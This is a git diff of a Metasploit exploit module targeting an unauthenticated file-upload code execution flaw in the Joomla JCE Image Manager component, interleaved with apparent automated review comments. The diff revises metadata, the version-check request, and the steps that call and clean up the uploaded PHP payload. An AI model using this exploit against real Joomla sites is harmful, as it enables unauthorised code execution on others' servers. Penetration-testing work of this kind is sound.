diff --git a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
index b6adbc2cf3..b2699c66d7 100644
--- a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
+++ b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
@@ -15,32 +15,33 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Joomla Component JCE File Upload Code Execution', + 'Name' => 'Joomla Component JCE File Upload Remote Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the JCE component for Joomla! - could allow a unauthenticated remote attacker to upload arbitrary files, - caused by the fails to sufficiently sanitize user-supplied input. - Sending a specially-crafted HTTP request, a remote attacker could exploit - this vulnerability to upload a malicious PHP script, which could allow the - attacker to execute arbitrary PHP code on the vulnerable system. + This module exploits a vulnerability in the JCE component for Joomla!, which + could allow an unauthenticated remote attacker to upload arbitrary files, caused by the + fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP + request, a remote attacker could exploit this vulnerability to upload a malicious PHP + script, which could allow the attacker to execute arbitrary PHP code on the vulnerable + system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla + 1.5.26. }, - 'Author' => [ 'Heyder Andrade ' ], + 'Author' => + [ + 'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC + 'Heyder Andrade ' # Metasploit module + ], 'License' => MSF_LICENSE, 'References' => [ ['BID', '49338'], - ['EDB', '17734'], + ['EDB', '17734'] ], 'Payload' => { 'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long) 'DisableNops' => true, 'BadChars' => "#", - 'Keys' => ['php'], - 'Compat' => - { - 'ConnectionType' => 'find', - }, + 'Keys' => ['php'] }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 
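Review bot: The rewrapped 'Description' string still reads ungrammatically (`caused by the fails to sufficiently sanitize user-supplied input`, `Sending specially-crafted HTTP request`), so since the commit already rewrites this text it should fix the wording as well. I would phrase the middle of it as `The vulnerability is caused by a failure to sufficiently sanitize user-supplied input. By sending a specially-crafted HTTP request, a remote attacker could upload a malicious PHP script and execute arbitrary PHP code on the vulnerable system.` The hunk also drops the `'Compat' => { 'ConnectionType' => 'find' }` entry from the payload options without a word on why it is no longer needed for the PHP payload; a short comment next to `'Keys' => ['php']` or a line in the commit message would spare the next reader a search. The `initialize` body this hunk edits continues past the hunk's last line.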
@@ -60,21 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote # check imgmanager version @uri_base = normalize_uri(target_uri.path.to_s, 'index.php') @vars_get_base = { - 'option'=> 'com_jce', - 'task' => 'plugin', - 'plugin'=> 'imgmanager', - 'file' => 'imgmanager' - } + 'option'=> 'com_jce', + 'task' => 'plugin', + 'plugin'=> 'imgmanager', + 'file' => 'imgmanager' + } print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") - res = send_request_cgi( - { - 'uri' => @uri_base, - 'vars_get' => @vars_get_base, - 'method' => 'GET', - 'version' => '1.1' - - }) + res = send_request_cgi({ + 'uri' => @uri_base, + 'vars_get' => @vars_get_base, + 'method' => 'GET', + 'version' => '1.1' + }) + version = nil if (res and res.code == 200) res.body.match(%r{^\s+?Image\sManager\s:\s?(.*)<}) version = $1.nil? ? nil : $1 @@ -171,7 +171,6 @@ class Metasploit3 < Msf::Exploit::Remote payload = "#{@payload_name}.php" print_status("Calling payload: #{payload}") uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload) - register_files_for_cleanup(payload) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', @@ -186,6 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote return if not check == Exploit::CheckCode::Vulnerable if upload_gif == :success if renamed? + register_files_for_cleanup("#{@payload_name}.php") call_payload end end
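Review bot: The added `version = nil` carries no explanation; it presumably supplies the fall-through value for whatever compares `version` after the hunk when the probe request fails or does not answer 200, and a comment would make that intent explicit: `# stays nil unless the component page answers 200 and the Image Manager banner matches`. The two lines right after it still read the capture through the global `$1` with the redundant `$1.nil? ? nil : $1`; while this spot is being touched, `m = res.body.match(%r{...}); version = m[1] if m` avoids the global and makes the nil path obvious. The enclosing method starts before this hunk and the use of `version` lies beyond its last line.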
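Review bot: The new `register_files_for_cleanup("#{@payload_name}.php")` registers a bare file name while the earlier hunk fetches the script at `images/stories/<name>.php`; cleanup is performed through the PHP session on the target, so the file is only removed if that session's working directory is `images/stories/`, which appears to be assumed here and deserves a comment such as `# relative to the session cwd, expected to be images/stories/ where the renamed script runs`. Registering only after `renamed?` succeeds is the right order, but when the rename fails the file uploaded by `upload_gif` is left on the target with no session to clean it, so an `else` branch that prints a warning naming the leftover file would at least tell the operator. The script name is now built in two places (`payload = "#{@payload_name}.php"` in the other hunk and here); a single helper or instance variable would keep them from drifting. The method this hunk edits (likely `exploit`) begins before the hunk.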